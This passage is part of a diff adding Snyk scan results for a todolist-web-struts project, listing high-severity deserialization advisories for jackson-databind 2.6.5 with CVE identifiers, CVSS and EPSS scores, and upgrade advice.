"[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for 